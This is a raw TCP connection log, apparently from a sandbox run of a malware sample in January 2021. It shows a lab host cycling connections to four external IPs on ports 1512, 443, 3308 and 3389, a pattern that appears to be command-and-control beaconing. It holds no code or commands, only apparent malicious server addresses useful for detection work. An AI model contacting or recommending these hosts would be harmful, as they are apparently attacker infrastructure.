Jan 12, 2021 01:44:06.665306091 CET	49178	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:06.718205929 CET	1512	49178	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:06.779073000 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:06.831127882 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:06.831290960 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:06.832885981 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:06.884788990 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:06.899440050 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:06.899580002 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:06.911473989 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:06.965972900 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:06.966160059 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:06.977889061 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:06.977996111 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:07.029903889 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:07.030128956 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:07.082288980 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:07.200975895 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:07.201018095 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:07.201164007 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:07.206784964 CET	49179	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:07.258805990 CET	443	49179	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:07.334985018 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:07.378300905 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:07.378432989 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:07.379849911 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:07.423007965 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:07.433881998 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:07.433922052 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:07.434011936 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:07.458878994 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:07.504134893 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:07.504378080 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:07.516047001 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:07.516267061 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:07.559429884 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:07.559608936 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:07.599394083 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:07.602721930 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:07.602869987 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:07.715307951 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:07.715352058 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:07.715605021 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:07.721174955 CET	49180	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:07.764467001 CET	3308	49180	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:07.844260931 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:07.898483038 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:07.898612976 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:07.899720907 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:07.953466892 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:07.976249933 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:07.976290941 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:07.976352930 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:07.976397991 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:07.989943027 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:08.049705982 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:08.050076008 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:08.064135075 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:08.064189911 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:08.118344069 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:08.118650913 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:08.158106089 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:08.172874928 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:08.172916889 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:08.265120029 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:08.265156984 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:08.265332937 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:08.265376091 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:08.270905018 CET	49181	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:08.324676991 CET	3389	49181	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:08.390815973 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:08.443778038 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:08.443989992 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:08.445559978 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:08.498441935 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:08.505271912 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:08.505307913 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:08.505428076 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:08.520010948 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:08.574084044 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:08.574374914 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:08.587261915 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:08.587537050 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:08.640418053 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:08.640777111 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:08.678262949 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:08.693666935 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:08.795748949 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:08.795784950 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:08.795897007 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:08.795941114 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:08.799726963 CET	49182	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:08.852503061 CET	1512	49182	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:08.915774107 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:08.967988014 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:08.968101978 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:08.969253063 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:09.021473885 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:09.036133051 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:09.036290884 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:09.054589033 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:09.109201908 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:09.109575033 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:09.120481014 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:09.120657921 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:09.172732115 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:09.173105955 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:09.211174011 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:09.225271940 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:09.343266964 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:09.343310118 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:09.343590021 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:09.349550962 CET	49183	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:09.401747942 CET	443	49183	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:09.466751099 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:09.510020971 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:09.510164976 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:09.511511087 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:09.554586887 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:09.566864967 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:09.566910982 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:09.566996098 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:09.567032099 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:09.581860065 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:09.626769066 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:09.626986980 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:09.636291981 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:09.636449099 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:09.679513931 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:09.679783106 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:09.719427109 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:09.722965002 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:09.723005056 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:09.835958958 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:09.836003065 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:09.836189032 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:09.841820955 CET	49184	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:09.884839058 CET	3308	49184	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:09.950974941 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:10.004393101 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:10.004586935 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:10.005893946 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:10.021339893 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:44:10.021573067 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:44:10.059397936 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:10.076718092 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:10.076761961 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:10.076845884 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:10.076894045 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:10.089380026 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:10.150939941 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:10.151321888 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:10.162758112 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:10.162842989 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:10.217453957 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:10.217818975 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:10.257585049 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:10.271416903 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:10.271460056 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:10.361104012 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:10.361148119 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:10.361371040 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:10.367449999 CET	49185	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:10.421050072 CET	3389	49185	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:10.486434937 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:10.539396048 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:10.539602995 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:10.541073084 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:10.593928099 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:10.600696087 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:10.600739956 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:10.600830078 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:10.600852966 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:10.615220070 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:10.669581890 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:10.669866085 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:10.680119991 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:10.680546999 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:10.733445883 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:10.733778000 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:10.770195961 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:10.786828995 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:10.887994051 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:10.888041019 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:10.888377905 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:10.894047976 CET	49186	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:10.946923971 CET	1512	49186	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:11.011173010 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:11.063241959 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:11.063383102 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:11.065340042 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:11.117259026 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:11.132100105 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:11.132211924 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:11.139863968 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:11.194112062 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:11.194202900 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:11.199773073 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:11.199853897 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:11.251810074 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:11.251928091 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:11.291126966 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:11.303925991 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:11.421938896 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:11.421983957 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:11.422234058 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:11.427839994 CET	49187	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:11.479801893 CET	443	49187	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:11.541837931 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:11.585128069 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:11.585319996 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:11.586832047 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:11.629812002 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:11.645474911 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:11.645522118 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:11.645673037 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:11.645711899 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:11.663362026 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:11.708297968 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:11.708419085 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:11.718561888 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:11.718935013 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:11.762085915 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:11.762288094 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:11.801362991 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:11.805538893 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:11.805591106 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:11.920442104 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:11.920484066 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:11.920708895 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:11.926281929 CET	49188	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:11.969485998 CET	3308	49188	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:12.041013002 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:12.094783068 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:12.094901085 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:12.096472979 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:12.149864912 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:12.172173023 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:12.172218084 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:12.172326088 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:12.172671080 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:12.185017109 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:12.244183064 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:12.244399071 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:12.253650904 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:12.253818035 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:12.307760954 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:12.308108091 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:12.346434116 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:12.361753941 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:12.361814022 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:12.453195095 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:12.453238964 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:12.453434944 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:12.455965042 CET	49189	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:12.509658098 CET	3389	49189	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:12.567262888 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:12.620413065 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:12.620517969 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:12.621893883 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:12.674940109 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:12.681900978 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:12.681935072 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:12.681998014 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:12.682039022 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:12.688426971 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:12.742609024 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:12.742871046 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:12.756838083 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:12.757065058 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:12.810241938 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:12.810456038 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:12.846388102 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:12.863606930 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:12.863648891 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:12.965457916 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:12.965498924 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:12.965545893 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:12.965594053 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:12.967698097 CET	49190	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:44:13.020669937 CET	1512	49190	46.105.131.65	192.168.2.22
Jan 12, 2021 01:44:13.080630064 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:13.132369041 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:13.132457972 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:13.133377075 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:13.185075998 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:13.200539112 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:13.200664043 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:13.214638948 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:13.268858910 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:13.269120932 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:13.277266979 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:13.277446985 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:13.328998089 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:13.329252958 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:13.367065907 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:13.380954981 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:13.498608112 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:13.498650074 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:13.498693943 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:13.498732090 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:13.500835896 CET	49191	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:44:13.552360058 CET	443	49191	77.220.64.37	192.168.2.22
Jan 12, 2021 01:44:13.613048077 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:13.656266928 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:13.656403065 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:13.657917023 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:13.701041937 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:13.712604046 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:13.712646961 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:13.712738991 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:13.726676941 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:13.771447897 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:13.771614075 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:13.782351971 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:13.782800913 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:13.826033115 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:13.826133013 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:13.869373083 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:13.982546091 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:13.982610941 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:13.982650995 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:13.984065056 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:13.984651089 CET	49192	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:44:14.027909040 CET	3308	49192	80.86.91.27	192.168.2.22
Jan 12, 2021 01:44:14.110261917 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:14.163846016 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:14.163955927 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:14.165352106 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:14.218734980 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:14.238929987 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:14.238970995 CET	3389	49193	5.100.228.233	192.168.2.22
Jan 12, 2021 01:44:14.239092112 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:14.251101971 CET	49193	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:44:14.310889006 CET	3389	49193	5.100.228.233	192.168.2.22
